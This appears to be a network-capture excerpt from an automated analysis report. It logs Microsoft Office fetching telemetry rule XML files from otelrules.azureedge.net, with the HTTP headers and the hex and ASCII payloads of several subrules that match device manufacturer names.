                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        15192.168.2.44976813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8317a370-b01e-0001-33d5-3346e2000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968glpgnhC1EWR7uec00000005b0000000006beh
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        16192.168.2.44976913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 33d009d3-501e-007b-36d5-335ba2000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968l4kp6hC1EWRe88400000005b000000000htza
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        17192.168.2.44977013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1973b281-501e-0047-7bd5-33ce6c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968cdxdrhC1EWRg0en00000004yg00000000ucwy
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        18192.168.2.44977213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 9a2bdabf-a01e-0053-27d5-338603000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153658Z-174f7845968pf68xhC1EWRr4h8000000059000000000qrgh
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        19192.168.2.44977113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 55c0910e-d01e-0082-5dd5-33e489000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153658Z-174f784596886s2bhC1EWR743w000000058g0000000020g2
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        20192.168.2.44977413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1815df8f-001e-0028-27d5-33c49f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f7845968j6t2phC1EWRcfe8000000055g00000000rmwu
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        21192.168.2.44977313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:57 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: feb354c0-101e-0079-0dd5-335913000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153657Z-174f78459685726chC1EWRsnbg000000054g00000000hsxr
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        22192.168.2.44977813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1958a6a9-101e-0046-5bd5-3391b0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153658Z-174f7845968l4kp6hC1EWRe884000000058000000000szch
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        23192.168.2.44977613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 87508168-a01e-0098-0bd5-338556000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153658Z-174f7845968cpnpfhC1EWR3afc00000004t000000000at1e
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
